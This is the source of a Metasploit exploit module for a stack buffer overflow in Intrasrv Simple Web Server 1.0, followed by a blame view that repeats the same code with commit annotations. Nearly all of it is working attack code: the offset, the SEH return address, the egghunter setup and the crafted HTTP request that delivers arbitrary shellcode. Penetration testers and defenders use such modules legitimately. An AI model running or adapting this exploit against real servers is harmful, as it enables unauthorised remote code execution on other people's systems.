metasploit-framework/modules/exploits/windows/http/intrasrv_bof.rb

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Egghunter

	def initialize(info={})
		super(update_info(info,
			'Name'           => "Intrasrv 1.0 Buffer Overflow",
			'Description'    => %q{
					This module exploits a boundary condition error in Intrasrv Simple Web
					Server 1.0. The web interface does not validate the boundaries of an
					HTTP request string prior to copying the data to an insufficiently large
					buffer. Successful exploitation leads to arbitrary remote code execution
					in the context of the application.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'xis_one@STM Solutions',  #Discovery, PoC
					'PsychoSpy <neinwechter[at]gmail.com>' #Metasploit
				],
			'References'     =>
				[
					['OSVDB', '94097'],
					['EDB','18397'],
					['BID','60229']
				],
			'Payload'        =>
				{
					'StackAdjustment' => -3500,
					'BadChars' => "\x00"
				},
			'DefaultOptions'  =>
				{
					'ExitFunction' => "thread"
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					['v1.0 - XP/2003/Win7',
						{
							'Offset' => 1553,
							'Ret'=>0x004097dd #p/p/r - intrasrv.exe
						}
					]
				],
			'Privileged'     => false,
			'DisclosureDate' => "May 30 2013",
			'DefaultTarget'  => 0))

			register_options(
				[
					OptPort.new('RPORT', [true, 'The remote port', 80])
				], self.class)
	end

	def check
		begin
			connect
		rescue
			print_error("Could not connect to target!")
			return Exploit::CheckCode::Safe
		end
		sock.put("GET / HTTP/1.0\r\n")
		res = sock.get

		if res and res =~ /intrasrv 1.0/
			return Exploit::CheckCode::Vulnerable
		else
			return Exploit::CheckCode::Safe
		end
	end

	def exploit
		# setup egghunter
		hunter,egg = generate_egghunter(payload.encoded, payload_badchars, {
				:checksum => true
			})

		# setup buffer
		buf = rand_text_alpha(target['Offset']-128)		# junk to egghunter
		buf << make_nops(8) + hunter				# nopsled + egghunter at offset-128
		buf << rand_text_alpha(target['Offset']-buf.length)	# more junk to offset
		buf << "\xeb\x80\x90\x90" 				# nseh - jmp -128 to egghunter
		buf << [target.ret].pack("V*") 				# seh

		# attach egg tag to payload
		shellcode = egg + egg
		shellcode << payload.encoded

		print_status("Sending buffer...")
		connect
		sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n#{shellcode}")
		disconnect
	end
end
Added Intrasrv 1.0 BOF 2013-08-10 19:56:07 +00:00			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
			`# http://metasploit.com/framework/`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Exploit::Remote`
			`Rank = NormalRanking`

			`include Msf::Exploit::Remote::Tcp`
			`include Msf::Exploit::Egghunter`

			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => "Intrasrv 1.0 Buffer Overflow",`
			`'Description' => %q{`
msftidy 2013-08-10 20:01:44 +00:00			`This module exploits a boundary condition error in Intrasrv Simple Web`
			`Server 1.0. The web interface does not validate the boundaries of an`
			`HTTP request string prior to copying the data to an insufficiently large`
			`buffer. Successful exploitation leads to arbitrary remote code execution`
			`in the context of the application.`
Added Intrasrv 1.0 BOF 2013-08-10 19:56:07 +00:00			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'xis_one@STM Solutions', #Discovery, PoC`
			`'PsychoSpy <neinwechter[at]gmail.com>' #Metasploit`
			`],`
			`'References' =>`
			`[`
			`['OSVDB', '94097'],`
			`['EDB','18397'],`
			`['BID','60229']`
			`],`
			`'Payload' =>`
			`{`
			`'StackAdjustment' => -3500,`
			`'BadChars' => "\x00"`
			`},`
			`'DefaultOptions' =>`
			`{`
			`'ExitFunction' => "thread"`
			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`['v1.0 - XP/2003/Win7',`
			`{`
			`'Offset' => 1553,`
			`'Ret'=>0x004097dd #p/p/r - intrasrv.exe`
			`}`
			`]`
			`],`
			`'Privileged' => false,`
			`'DisclosureDate' => "May 30 2013",`
			`'DefaultTarget' => 0))`

			`register_options(`
			`[`
			`OptPort.new('RPORT', [true, 'The remote port', 80])`
			`], self.class)`
			`end`

			`def check`
			`begin`
			`connect`
			`rescue`
			`print_error("Could not connect to target!")`
			`return Exploit::CheckCode::Safe`
			`end`
			`sock.put("GET / HTTP/1.0\r\n")`
			`res = sock.get`

			`if res and res =~ /intrasrv 1.0/`
			`return Exploit::CheckCode::Vulnerable`
			`else`
			`return Exploit::CheckCode::Safe`
			`end`
			`end`

			`def exploit`
			`# setup egghunter`
			`hunter,egg = generate_egghunter(payload.encoded, payload_badchars, {`
			`:checksum => true`
			`})`
msftidy 2013-08-10 20:01:44 +00:00
Added Intrasrv 1.0 BOF 2013-08-10 19:56:07 +00:00			`# setup buffer`
			`buf = rand_text_alpha(target['Offset']-128) # junk to egghunter`
			`buf << make_nops(8) + hunter # nopsled + egghunter at offset-128`
			`buf << rand_text_alpha(target['Offset']-buf.length) # more junk to offset`
			`buf << "\xeb\x80\x90\x90" # nseh - jmp -128 to egghunter`
			`buf << [target.ret].pack("V*") # seh`

			`# attach egg tag to payload`
			`shellcode = egg + egg`
			`shellcode << payload.encoded`

			`print_status("Sending buffer...")`
			`connect`
			`sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n#{shellcode}")`
			`disconnect`
			`end`
			`end`